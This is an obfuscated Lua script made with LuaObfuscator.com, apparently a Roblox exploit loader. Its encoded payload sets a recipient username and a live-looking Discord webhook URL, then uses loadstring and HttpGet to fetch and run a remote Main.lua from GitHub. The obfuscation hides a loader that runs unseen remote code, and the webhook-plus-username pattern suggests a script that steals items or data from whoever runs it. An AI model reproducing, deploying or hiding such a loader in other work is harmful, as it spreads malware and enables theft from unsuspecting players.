--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then v19=v0(v3(v20,1,1));return "";else local v69=v2(v0(v20,16));if v19 then local v78=v5(v69,v19);v19=nil;return v78;else return v69;end end end);local function v21(v22,v23,v24)if v24 then local v70=0 + 0 ;local v71;while true do if (v70==(0 -0)) then v71=(v22/((7 -5)^(v23-((2 -1) + 0))))%((4 -(501 -(216 + 283)))^(((v24-(1 + (0 -0))) -(v23-(1 + 0))) + (226 -(73 + 152)))) ;return v71-(v71%(1 + 0)) ;end end else local v72=2^(v23-(1812 -(546 + (1959 -(426 + 268))))) ;return (((v22%(v72 + v72))>=v72) and (3 -2)) or 0 ;end end local function v25()local v38=0 -0 ;local v39;while true do if ((978 -(24 + 953))==v38) then return v39;end if (v38==((1025 -(843 + 182)) -0)) then v39=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v38=(1 + 0) -0 ;end end end local function v26()local v40=1482 -(821 + 661) ;local v41;local v42;while true do if ((0 -0)==v40) then v41,v42=v1(v16,v18,v18 + (938 -(787 + 149)) );v18=v18 + 1 + 1 ;v40=1 + (1139 -(57 + 1082)) ;end if (v40==(525 -(149 + 375))) then return (v42 * (656 -400)) + v41 ;end end end local function v27()local v43=(0 + 0) -0 ;local v44;local v45;local v46;local v47;while true do if (v43==(931 -(592 + 339))) then v44,v45,v46,v47=v1(v16,v18,v18 + (10 -7) );v18=v18 + 3 + 1 ;v43=1 -0 ;end if (v43==(1 + 0)) then return (v47 * (16778829 -(504 + 1109))) + (v46 * (44888 + 20648)) + (v45 * ((882 -(395 + 341)) + 110)) + v44 ;end end end local function v28()local v48=v27();local v49=v27();local v50=(2 -1) + 0 ;local v51=(v21(v49,1 -0 ,20) * ((1 + 1)^(1377 -(1094 + 251)))) + v48 ;local v52=v21(v49,1285 -(721 + 543) ,1385 -(1332 + 22) );local v53=((v21(v49,(3 -2) + 31 )==(1 + 0)) and  -(1 -0)) or (3 -2) ;if (v52==(1690 -(1448 + (470 -228)))) then if (v51==0) then return v53 * 0 ;else v52=3 -2 ;v50=0 -0 ;end elseif (v52==(4235 -2188)) then return ((v51==0) and (v53 * ((1 + 0)/(0 -0)))) or (v53 * NaN) ;end return v8(v53,v52-(2387 -((2016 -(9 + 1464)) + 821)) ) * (v50 + (v51/((1 + 1)^(585 -(323 + 210))))) ;end local function v29(v30)local v54=0;local v55;local v56;while true do if (v54==(1 + 1)) then v56={};for v79=1 + 0 , #v55 do v56[v79]=v2(v1(v3(v55,v79,v79)));end v54=7 -4 ;end if (v54==(7 -4)) then return v6(v56);end if (v54==((593 -(17 + 529)) -((44 -22) + 25))) then v55=nil;if  not v30 then v30=v27();if (v30==(1122 -(13 + 1109))) then return "";end end v54=2 -1 ;end if (v54==(1 + 0)) then v55=v3(v16,v18,(v18 + v30) -(1452 -(1045 + 406)) );v18=v18 + v30 ;v54=1 + 1 ;end end end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v57=0 -0 ;local v58;local v59;local v60;local v61;local v62;local v63;local v64;while true do if ((702 -(552 + 149))==v57) then v60=nil;v61=nil;v57=1 + 1 ;end if (v57==(235 -(80 + 153))) then local v73=428 -(184 + 244) ;while true do if (v73==(1 + 0)) then v57=3;break;end if ((0 + 0)~=v73) then else v62=nil;v63=nil;v73=1 + 0 ;end end end if (v57~=(8 -5)) then else v64=nil;while true do local v81=0 + 0 ;local v82;while true do if (v81==(44 -(18 + 26))) then v82=0;while true do if (v82~=1) then else if (v58~=3) then else local v108=1905 -(1844 + 61) ;while true do if (v108~=(0 -0)) then else for v132=1,v27() do v60[v132-(82 -(74 + 7)) ]=v33();end for v134=1,v27() do v61[v134]=v27();end v108=1;end if (v108==1) then return v62;end end end if (v58==(1 -0)) then v62={v59,v60,nil,v61};v63=v27();v64={};v58=6 -4 ;end break;end if ((0 + 0)~=v82) then else if (v58~=(0 + 0)) then else local v109=0;while true do if (v109~=(261 -(188 + 73))) then else v59={};v60={};v109=1;end if (v109~=1) then else v61={};v58=3 -2 ;break;end end end if (v58==(2 + 0)) then local v110=0 -0 ;local v111;while true do if (v110~=(0 + 0)) then else v111=0;while true do if (v111~=0) then else local v136=0;while true do if (v136~=(0 + 0)) then else for v150=1,v63 do local v151=0;local v152;local v153;local v154;while true do if (v151==(1213 -(872 + 340))) then v154=nil;while true do if (v152~=0) then else local v170=0;local v171;local v172;while true do if (v170==(1360 -(296 + 1063))) then while true do if (v171==0) then v172=0 + 0 ;while true do if (v172~=(1 -0)) then else v152=1;break;end if (v172~=0) then else local v188=0;local v189;while true do if (v188==0) then v189=783 -(563 + 220) ;while true do if (v189==0) then local v194=0;while true do if (v194~=0) then else v153=v25();v154=nil;v194=1;end if ((1 + 0)~=v194) then else v189=3 -2 ;break;end end end if (v189==1) then v172=1;break;end end break;end end end end break;end end break;end if (0==v170) then v171=644 -(16 + 628) ;v172=nil;v170=1;end end end if (v152==(843 -(840 + 2))) then if (v153==1) then v154=v25()~=0 ;elseif (v153==2) then v154=v28();elseif (v153~=3) then else v154=v29();end v64[v150]=v154;break;end end break;end if (v151==0) then local v160=0 -0 ;while true do if (v160==(0 -0)) then v152=0 -0 ;v153=nil;v160=1 -0 ;end if (v160~=(3 -2)) then else v151=1;break;end end end end end v62[1 + 2 ]=v25();v136=1 + 0 ;end if (v136~=(1 + 0)) then else v111=1 + 0 ;break;end end end if (v111==(1505 -(1362 + 142))) then for v138=1,v27() do local v139=0;local v140;local v141;while true do if (v139~=0) then else v140=0 + 0 ;v141=nil;v139=1;end if ((280 -(170 + 109))~=v139) then else while true do if (v140~=0) then else v141=v25();if (v21(v141,1 + 0 ,1)~=(0 -0)) then else local v164=0 -0 ;local v165;local v166;local v167;local v168;local v169;while true do if ((3 -1)==v164) then v169=nil;while true do if (v165==0) then local v177=0;while true do if (v177~=1) then else v165=1 + 0 ;break;end if (v177~=0) then else v166=0 + 0 ;v167=nil;v177=1;end end end if (2==v165) then while true do if (v166==(2 + 1)) then if (v21(v168,2 + 1 ,3)==(4 -3)) then v169[586 -(519 + 63) ]=v64[v169[1159 -(372 + 783) ]];end v59[v138]=v169;break;end if (v166~=1) then else local v181=0;local v182;while true do if (v181~=(0 -0)) then else v182=0 + 0 ;while true do if (v182==1) then v166=2;break;end if (v182~=(531 -(330 + 201))) then else local v192=0;while true do if (v192~=1) then else v182=1 -0 ;break;end if ((979 -(774 + 205))~=v192) then else local v195=0;while true do if (v195==(1173 -(302 + 871))) then v169={v26(),v26(),nil,nil};if (v167==0) then local v201=0 -0 ;local v202;local v203;while true do if (v201==1) then while true do if (v202~=0) then else v203=1736 -(316 + 1420) ;while true do if (v203~=0) then else v169[2 + 1 ]=v26();v169[4]=v26();break;end end break;end end break;end if (v201==(0 + 0)) then local v205=1612 -(1249 + 363) ;while true do if (v205==(202 -(57 + 145))) then v202=0;v203=nil;v205=1;end if (v205==(1 + 0)) then v201=1;break;end end end end elseif (v167==1) then v169[1540 -(1387 + 150) ]=v27();elseif (v167==2) then v169[6 -3 ]=v27() -(2^(4 + 12)) ;elseif (v167~=3) then else local v207=0;local v208;local v209;local v210;while true do if (v207==1) then v210=nil;while true do if (v208~=(0 -0)) then else local v213=1739 -(1610 + 129) ;while true do if (v213~=0) then else v209=0 + 0 ;v210=nil;v213=1;end if (v213==1) then v208=1;break;end end end if (v208~=(1 + 0)) then else while true do if ((1033 -(421 + 612))~=v209) then else v210=0;while true do if (v210==0) then v169[4 -1 ]=v27() -((1 + 1)^16) ;v169[1243 -(71 + 1168) ]=v26();break;end end break;end end break;end end break;end if (v207~=(0 -0)) then else v208=0 -0 ;v209=nil;v207=3 -2 ;end end end v195=1 + 0 ;end if (v195==1) then v192=1;break;end end end end end end break;end end end if (v166==(0 + 0)) then local v183=0;local v184;while true do if (v183~=0) then else v184=0;while true do if (v184~=1) then else v166=1;break;end if (v184~=(0 + 0)) then else local v193=0 -0 ;while true do if (v193~=0) then else local v196=0;while true do if (0~=v196) then else v167=v21(v141,1650 -(433 + 1215) ,3);v168=v21(v141,4,8 -2 );v196=4 -3 ;end if (v196~=(1 + 0)) then else v193=1;break;end end end if (v193==1) then v184=2 -1 ;break;end end end end break;end end end if (v166~=2) then else local v185=0 -0 ;local v186;local v187;while true do if (v185~=0) then else v186=0 + 0 ;v187=nil;v185=1;end if (v185==(1 + 0)) then while true do if (v186~=(0 + 0)) then else v187=0;while true do if ((2 -1)~=v187) then else v166=3;break;end if ((0 + 0)~=v187) then else if (v21(v168,1,1)==1) then v169[173 -(57 + 114) ]=v64[v169[2 + 0 ]];end if (v21(v168,1 + 1 ,2)~=(1 + 0)) then else v169[1 + 2 ]=v64[v169[3]];end v187=1 + 0 ;end end break;end end break;end end end end break;end if (v165==(1 + 0)) then local v178=0;while true do if (v178~=0) then else v168=nil;v169=nil;v178=1;end if (v178==(3 -2)) then v165=2;break;end end end end break;end if (v164==(0 + 0)) then v165=0 -0 ;v166=nil;v164=1;end if (v164==(1676 -(864 + 811))) then v167=nil;v168=nil;v164=2 + 0 ;end end end break;end end break;end end end v58=3;break;end end break;end end end v82=1943 -(1674 + 268) ;end end break;end end end break;end if (v57~=(541 -(179 + 362))) then else local v74=0;while true do if (v74~=(0 -0)) then else v58=0 + 0 ;v59=nil;v74=1;end if ((426 -(370 + 55))~=v74) then else v57=1;break;end end end end end local function v34(v35,v36,v37)local v65=0;local v66;local v67;local v68;while true do if (v65==1) then v68=v35[3];return function(...)local v83=1;local v84= -1;local v85={...};local v86=v12("#",...) -1 ;local function v87()local v88=v66;local v89=v67;local v90=v68;local v91=v32;local v92={};local v93={};local v94={};for v98=0,v86 do if (((9925 -6451)==3474) and (v98>=v90)) then v92[v98-v90 ]=v85[v98 + (1 -0) ];else v94[v98]=v85[v98 + ((5 -3) -1) ];end end local v95=(v86-v90) + 1 + 0 ;local v96;local v97;while true do local v99=0 + 0 ;while true do if ((v99==(696 -(350 + 346))) or ((4951 -(418 + 248))<2312)) then v96=v88[v83];v97=v96[479 -(193 + 285) ];v99=1;end if (((2758 -(1752 + 120))<(668 + 765)) and (v99==(1970 -((2284 -(328 + 106)) + 119)))) then if ((3029>=(3497 -(96 + 421))) and (v97<=(989 -(463 + 523)))) then if ((v97<=1) or ((4117 -2147)>=(602 + 1577 + 2272))) then if ((1809==(2518 -(435 + 274))) and (v97==(0 + 0))) then local v112=0 -0 ;local v113;local v114;local v115;while true do if (((0 -0)==v112) or (((2251 + 2001) -1501)>4322)) then v113=0 + 0 ;v114=nil;v112=1;end if ((v112==((1 + 2) -2)) or ((17596 -13795)==1651)) then v115=nil;while true do if (((36 -(10 + 26))==v113) or ((1547 + 125)<=(3899 -2412))) then local v143=1971 -(1459 + 512) ;while true do if (((230 + 3201)>=178) and (v143==(1 -0))) then v113=1 -(1691 -(838 + 853)) ;break;end if ((4424>(2564 -(207 + 57))) and (v143==(0 + 0))) then v114=v96[1381 -(519 + 860) ];v115=v94[v96[3]];v143=1617 -(1549 + 67) ;end end end if (((14313 -11003)>(11288 -8897)) and (v113==(2 -(3 -2)))) then v94[v114 + (529 -(445 + 83)) ]=v115;v94[v114]=v115[v96[(1 + 4) -1 ]];break;end end break;end end else local v116=0 -0 ;local v117;local v118;local v119;local v120;local v121;local v122;while true do if ((v116==1) or ((5157 -2031)>(1246 + 3075))) then v119=nil;v120=nil;v116=2;end if ((v116==(1046 -((741 -(71 + 52)) + 426))) or (((16315 -11793) -(960 + 1010))<((1055 -672) + (996 -341)))) then v121=nil;v122=nil;v116=1405 -(688 + 714) ;end if (((4439 -(36 + 105))>=(200 + 137)) and (v116==(0 -0))) then v117=0 + 0 ;v118=nil;v116=1 + 0 ;end if (((6056 -(1533 + 190))>=(3859 + 14)) and (v116==3)) then while true do if ((((1 + 2) -1)==v117) or ((91 + 98)>(506 + 347))) then v122=nil;while true do if ((v118==(0 -0)) or (((2312 -(24 + 1072)) + 477)<=(766 + (173 -137)))) then local v157=0 + 0 ;local v158;while true do if (((2232 + 101)>(1005 + 617)) and (v157==(365 -(135 + 230)))) then v158=(1984 -(216 + 1768)) -(0 -0) ;while true do if ((v158==(339 -((899 -586) + 26))) or ((1092 -(729 + 220))>((11850 -8726) -(853 + 590)))) then local v174=1334 -(273 + 1061) ;while true do if (((5 + 365)==(727 -(315 + 42))) and (v174==(1627 -(483 + 1144)))) then v119=v96[2 + 0 ];v120,v121=v91(v94[v119](v13(v94,v119 + (776 -(25 + 750)) ,v96[3])));v174=295 -(43 + 251) ;end if ((2327>(1726 -(557 + 587 + 262))) and (v174==(1 -(0 + 0)))) then v158=2 -1 ;break;end end end if (((2 -1)==v158) or (3322>3976)) then v118=1 + 0 ;break;end end break;end end end if (((558 -(41 + 34))>=(623 -415)) and (v118==(7 -5))) then for v161=v119,v84 do local v162=0 -(0 -0) ;local v163;while true do if ((v162==((871 -(126 + 745)) -0)) or ((568 -(189 + 219))==(578 + 395))) then v163=(157 + 448) -(543 + 62) ;while true do if (((318 + 893)>=(814 -402)) and (v163==(0 + 0))) then v122=v122 + 1 ;v94[v161]=v120[v122];break;end end break;end end end break;end if (((2429 + 2494)==(4754 + 169)) and (v118==((1531 -(571 + 957)) -2))) then local v159=246 -(65 + 181) ;while true do if (((1863 + 2366)>(1492 + 1736)) and (v159==0)) then v84=(v121 + v119) -1 ;v122=0 + 0 ;v159=1;end if ((4781>=1885) and (v159==(1 + 0))) then v118=2;break;end end end end break;end if ((((3525 -(230 + 535)) -(93 + 812 + 437))<=(12949 -8822)) and (v117==1)) then v120=nil;v121=nil;v117=1 + 1 ;end if (((2322 + 320)<=(5053 -(14 + 1132))) and (v117==((423 + 600) -(182 + 841)))) then local v147=1581 -(834 + 747) ;while true do if ((v147==(463 -(6 + 456))) or ((357 + (1344 -699))<(48 + 127))) then v117=1 + 0 ;break;end if (((2984 -((939 -516) + 482))<((14116 -8910) -2610)) and (v147==0)) then v118=893 -(584 + 309) ;v119=nil;v147=1 + 0 ;end end end end break;end end end elseif (((9345 -7004)>=((3269 -(18 + 682)) -1857)) and (v97==(4 -2))) then local v123=0;local v124;local v125;while true do if (((1833 -(630 + 21))<(2069 -(232 + 394))) and (v123==(282 -(145 + 136)))) then while true do if (((586 + 162)<=(504 + 3498)) and (v124==0)) then v125=v96[7 -5 ];v94[v125]=v94[v125](v13(v94,v125 + 1 + 0 ,v84));break;end end break;end if ((v123==(1693 -(780 + 913))) or ((2135 + 548)>=(428 + 3758))) then local v137=0 + 0 ;while true do if (((1464 + 75 + 2493)>=(10750 -8093)) and (v137==(0 -0))) then v124=1186 -(158 + 1028) ;v125=nil;v137=1;end if ((4401>=(11336 -8177)) and (v137==(1 + 0))) then v123=(1408 -(1327 + 80)) -(1778 -(833 + 945)) ;break;end end end end else v37[v96[1656 -(1176 + 477) ]]=v94[v96[1215 -(500 + 713) ]];end elseif (((2654 -(7 + 9))>(2930 -2044)) and (v97<=(8 -3))) then if ((v97==(1 + 3)) or ((11861 -7871)>(1905 + 3001))) then v94[v96[(943 -(307 + 632)) -2 ]]();else do return;end end elseif (((996 + 1240)>=(3578 -(147 + 295 + 1002))) and (v97>(3 + 3))) then v94[v96[2]]=v37[v96[3 + 0 ]];else v94[v96[2]]=v96[3 + 0 ];end v83=v83 + (65 -((158 -107) + 13)) ;break;end end end end A,B=v32(v11(v87));if  not A[1] then local v100=0;local v101;while true do if (0==v100) then v101=v35[4][v83] or "?" ;error("Script error at ["   .. v101   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end end;end if (v65==0) then v66=v35[1];v67=v35[2];v65=1;end end end return v34(v33(),{},v17)(...);end v15("LOL!083O0003083O00557365724E616D6503123O0042726F446F6E744576656E5472794C6F6C5703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3130393137343538373832333632313O33392F61723756766745424174577771695234384C386C39685A6444566F676B4B7830696F61646F59453164415164695253386E6D3264686C2O464A52734A6D4F4E787A58674A030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F52692O7A2F6D61696E2F4D61696E2E6C7561000C3O0012063O00023O0012033O00013O0012063O00043O0012033O00033O0012073O00053O001207000100063O00202O000100010007001206000300084O0001000100034O00025O00022O00043O000100012O00053O00017O000C3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00053O00",v9(),...);end
